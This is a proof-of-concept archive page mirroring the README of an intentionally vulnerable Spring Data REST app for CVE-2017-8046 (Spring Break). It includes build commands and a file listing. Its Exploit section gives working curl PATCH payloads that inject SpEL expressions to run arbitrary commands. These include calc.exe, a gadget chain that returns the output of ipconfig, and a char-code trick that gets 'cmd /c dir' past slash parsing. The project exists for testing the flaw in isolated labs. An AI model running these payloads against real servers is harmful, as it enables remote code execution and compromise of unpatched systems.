Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2017-8046 PoC — Pivotal Spring Data REST、Spring Boot和Spring Data 安全漏洞

Source
https://github.com/m3ssap0/SpringBreakVulnerableApp
Associated Vulnerability
Title:Pivotal Spring Data REST、Spring Boot和Spring Data 安全漏洞 (CVE-2017-8046)
Description:Pivotal Spring Data REST、Spring Boot和Spring Data都是美国Pivotal Software公司的产品。Pivotal Spring Data REST是一个建立在Spring Data存储库之上的用于分析应用程序的域模型并公开超媒体驱动的HTTP资源。Spring Boot是一个用来简化新Spring应用的初始搭建以及开发过程的全新框架。Spring Data是一个为数据访问提供基于Spring模型的项目。 Pivotal Spring Data REST、S
Description
WARNING: This is a vulnerable application to test the exploit for the Spring Break vulnerability (CVE-2017-8046). Run it at your own risk!
Readme
# Spring Break Vulnerable Application

This is a vulnerable application to test the exploit for the **Spring Break** vulnerability (**CVE-2017-8046**).

## WARNING!

**This application contains serious security vulnerabilities. Run it at your own risk! It is recommended using a backed-up and sheltered environment (such as a VM with a recent snapshot and host-only networking). Do not upload this application to any Internet facing servers, as they will be compromised.**

***DISCLAIMER*: I do not take responsibility for the way in which any one uses this application (SpringBreakVulnerableApp). The only purpose of this application is to be a test scenario for the Spring Break exploit and it should not be used maliciously. If your server is compromised via an installation of SpringBreakVulnerableApp it is not my responsibility, it is the responsibility of the person(s) who uploaded and installed it.**

## Vulnerability info

* **CVE-ID**: CVE-2017-8046
* **Link**: [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046)
* **Description**: Malicious *PATCH* requests submitted to *spring-data-rest* servers in **Pivotal Spring Data REST** versions prior to **2.5.12**, **2.6.7**, **3.0 RC3**, **Spring Boot** versions prior to **2.0.0M4**, and **Spring Data** release trains prior to **Kay-RC3** can use specially crafted JSON data to run arbitrary Java code.

## Usage

The application can be launched with the following Maven command.

```
mvn spring-boot:run
```
A fat jar can be generated with the following Maven command.

```
mvn clean install spring-boot:repackage
```

To insert data you can use the following curl command.

```
curl -i -X POST -H "Content-Type: application/json" -d '{ "name" : "Test", "attribute" : "foo"}' http://hostname:port/entity
```

## Exploit

Probably the simplest exploit is the following request.

```
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(java.lang.Thread).sleep(10000).x", "value" : "pwned" }]' "http://hostname:port/entity/1"
```

On Windows, the `calc.exe` process can be launched with the following request. Similar requests can be used to launch arbitrary commands.

```
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(java.lang.Runtime).getRuntime().exec(\"calc.exe\").x", "value" : "pwned" }]' "http://hostname:port/entity/1/"
```

To obtain the output of launched commands, some "gadgets" offered by Spring Framework code can be used. Luckily, no external dependencies are required. For example, the result of `ipconfig` command can be retrieved with the following request.

```
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"ipconfig\").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x", "value" : "pwned" }]' "http://hostname:port/entity/1/"
```

On Windows, a `cmd /c dir` command, and other similar commands, can be launched with the following request. Please note the trick used to insert the slash char avoiding the explicit value (i.e. explicit slashes are replaced with dots befor the real parsing).

```
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"cmd \" + T(java.lang.String).valueOf(T(java.lang.Character).toChars(0x2F)) + \"c dir\").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x", "value" : "pwned" }]' "http://hostname:port/entity/1/"
```

A Java program to exploit this vulnerability can be found [here](https://github.com/m3ssap0/spring-break_cve-2017-8046).

## Authors

* **Antonio Francesco Sardella** - *implementation* - [m3ssap0](https://github.com/m3ssap0)

## License

This project is licensed under the MIT License - see the **LICENSE.txt** file for details.

## Acknowledgments

* [Man Yue Mo](https://lgtm.com/blog/spring_data_rest_CVE-2017-8046_ql) the security researcher who discovered the vulnerability
File Snapshot

 [4.0K]  /data/pocs/95853cbb8b2d3507ba4c02122d10029ffc5029be
├── [1.1K]  LICENSE.txt
├── [2.8K]  pom.xml
├── [4.3K]  README.md
└── [4.0K]  src
    └── [4.0K]  main
        └── [4.0K]  java
            └── [4.0K]  com
                └── [4.0K]  afs
                    └── [4.0K]  vulnerable
                        └── [4.0K]  springbreak
                            ├── [1.3K]  MyEntitiesRepository.java
                            ├── [1.5K]  MyEntity.java
                            └── [1.1K]  SpringDataRestApplication.java

7 directories, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.